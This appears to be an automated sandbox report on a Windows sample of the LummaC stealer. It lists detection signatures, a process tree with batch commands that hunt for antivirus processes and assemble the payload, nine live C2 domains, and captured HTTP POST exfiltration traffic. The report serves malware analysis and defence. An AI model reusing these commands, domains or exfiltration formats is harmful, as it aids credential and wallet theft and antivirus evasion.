Edit tour

Windows Analysis Report
80441fcf.exe

Overview

General Information

Sample name:	80441fcf.exe
Analysis ID:	1480529
MD5:	d3c1c1a07fc43292e7e29e57c752d4c5
SHA1:	378c2bf9ece8f5db60f56fda569d24c413d64b55
SHA256:	80441fcf20760b653d36c4bc78c58c9e05b190e811767c7ed523a904e53b0684
Tags:	exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Sigma detected: Search for Antivirus process

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file does not import any functions

PE file overlay found

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

80441fcf.exe (PID: 1892 cmdline: "C:\Users\user\Desktop\80441fcf.exe" MD5: D3C1C1A07FC43292E7E29E57C752D4C5)

conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5960 cmdline: "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6656 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 5892 cmdline: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 5036 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7128 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 1120 cmdline: cmd /c md 5758 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 4476 cmdline: cmd /c copy /b Cookbook + Increasingly + Rounds + Affordable 5758\Apply.pif MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 1264 cmdline: cmd /c copy /b Ink 5758\o MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Apply.pif (PID: 6488 cmdline: 5758\Apply.pif 5758\o MD5: 848164D084384C49937F99D5B894253E)

PING.EXE (PID: 3924 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "assumptionflattyou.shop"], "Build id": "HpOoIh--@Zakielk"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.2541881503.0000000004A04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Apply.pif PID: 6488	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Apply.pif PID: 6488	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: 5758\Apply.pif 5758\o, CommandLine: 5758\Apply.pif 5758\o, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit , ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: 5758\Apply.pif 5758\o, ProcessId: 6488, ProcessName: Apply.pif

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe", CommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe", CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Inventory Inventory.bat & Inventory.bat & exit , ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe", ProcessId: 5892, ProcessName: findstr.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.5 - Destination IP: 172.67.163.54

Timestamp:	2024-07-24T21:05:21.384801+0200
SID:	2048094
Source Port:	64747
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 172.67.163.54

Timestamp:	2024-07-24T21:05:14.060717+0200
SID:	2054653
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.5 - Destination IP: 172.67.163.54

Timestamp:	2024-07-24T21:05:15.361117+0200
SID:	2054653
Source Port:	49733
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration - Source IP: 192.168.2.5 - Destination IP: 172.67.163.54

Timestamp:	2024-07-24T21:05:16.915861+0200
SID:	2048094
Source Port:	49735
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 80441fcf.exe

Avira: detected

Antivirus detection for URL or domain

Source: technologyenterdo.shop	Avira URL Cloud: Label: malware
Source: https://assumptionflattyou.shop/api	Avira URL Cloud: Label: malware
Source: associationokeo.shop	Avira URL Cloud: Label: malware
Source: turkeyunlikelyofw.shop	Avira URL Cloud: Label: malware
Source: detectordiscusser.shop	Avira URL Cloud: Label: malware
Source: https://assumptionflattyou.shop:443/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000C.00000002.2541661745.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "problemregardybuiwo.fun", "lighterepisodeheighte.fun", "technologyenterdo.shop", "assumptionflattyou.shop"], "Build id": "HpOoIh--@Zakielk"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.7% probability

Sample uses string decryption to hide its real strings

Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: associationokeo.shop
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: turkeyunlikelyofw.shop
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: pooreveningfuseor.pw
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: edurestunningcrackyow.fun
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: detectordiscusser.shop
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: problemregardybuiwo.fun
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lighterepisodeheighte.fun
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: technologyenterdo.shop
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: assumptionflattyou.shop
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000C.00000003.2421668978.0000000004EE7000.00000004.00000800.00020000.00000000.sdmp	String decryptor: HpOoIh--@Zakielk

Source: 80441fcf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:64745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:64747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.163.54:443 -> 192.168.2.5:64748 version: TLS 1.2

Source:	Binary string: Z:\7zsfxmm-cd920c2bb1fac536108acd5da87f93b5cd38e3fa\Output\Win32\7ZSfxMod.pdb source: 80441fcf.exe
Source:	Binary string: Z:\7zsfxmm-cd920c2bb1fac536108acd5da87f93b5cd38e3fa\Output\Win32\7ZSfxMod.pdbt?= source: 80441fcf.exe

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_0040325A FindFirstFileW,FindClose,SetLastError,CompareFileTime,	0_2_0040325A
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_00402B9F FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,	0_2_00402B9F
Source: C:\Users\user\Desktop\80441fcf.exe	Code function: 0_2_00402CB4 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,	0_2_00402CB4
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008BE1AC GetFileAttributesW,FindFirstFileW,FindClose,	12_2_008BE1AC
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008BD98E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_008BD98E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008CA29A FindFirstFileW,Sleep,FindNextFileW,FindClose,	12_2_008CA29A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008C6406 FindFirstFileW,FindNextFileW,FindClose,	12_2_008C6406
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_0088C5F3 FindFirstFileExW,	12_2_0088C5F3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008C70FE FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	12_2_008C70FE
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008C705D FindFirstFileW,FindClose,	12_2_008C705D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008BD65B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	12_2_008BD65B
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif	Code function: 12_2_008C9DB1 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	12_2_008C9DB1

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Cookbook	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Increasingly	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: associationokeo.shop
Source: Malware configuration extractor	URLs: turkeyunlikelyofw.shop
Source: Malware configuration extractor	URLs: pooreveningfuseor.pw
Source: Malware configuration extractor	URLs: edurestunningcrackyow.fun
Source: Malware configuration extractor	URLs: detectordiscusser.shop
Source: Malware configuration extractor	URLs: problemregardybuiwo.fun
Source: Malware configuration extractor	URLs: lighterepisodeheighte.fun
Source: Malware configuration extractor	URLs: technologyenterdo.shop
Source: Malware configuration extractor	URLs: assumptionflattyou.shop

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: assumptionflattyou.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: assumptionflattyou.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 13683Host: assumptionflattyou.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 16226Host: assumptionflattyou.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20570Host: assumptionflattyou.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1270Host: assumptionflattyou.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 555626Host: assumptionflattyou.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif

Code function: 12_2_008CD5B3 InternetReadFile,SetEvent,GetLastError,SetEvent,

12_2_008CD5B3

Source: global traffic	DNS traffic detected: DNS query: qBnWsPFfTrJBhDSbGyd.qBnWsPFfTrJBhDSbGyd
Source: global traffic	DNS traffic detected: DNS query: assumptionflattyou.shop
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: assumptionflattyou.shop

Source: 80441fcf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 80441fcf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 80441fcf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 80441fcf.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 80441fcf.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 80441fcf.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 80441fcf.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 80441fcf.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 80441fcf.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp, 80441fcf.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: 80441fcf.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: 80441fcf.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: 80441fcf.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Apply.pif, 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmp, Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: 80441fcf.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Apply.pif, 0000000C.00000003.2483350363.0000000004B00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop/
Source: Apply.pif, 0000000C.00000002.2540514677.0000000001620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop/4
Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop/Pa
Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A8D000.00000004.00000800.00020000.00000000.sdmp, Apply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop/api
Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop/apir
Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop/apis
Source: Apply.pif, 0000000C.00000002.2540514677.0000000001620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop/apiy
Source: Apply.pif, 0000000C.00000002.2541881503.0000000004A74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop/os
Source: Apply.pif, 0000000C.00000002.2540514677.0000000001620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assumptionflattyou.shop:443/api
Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Apply.pif, 0000000C.00000003.2484956968.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Apply.pif, 0000000C.00000003.2426382536.0000000004542000.00000004.00000800.00020000.00000000.sdmp, Affordable.0.dr, Apply.pif.10.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Apply.pif.10.dr	String found in binary or memory: https://www.globalsign.com/repository/0
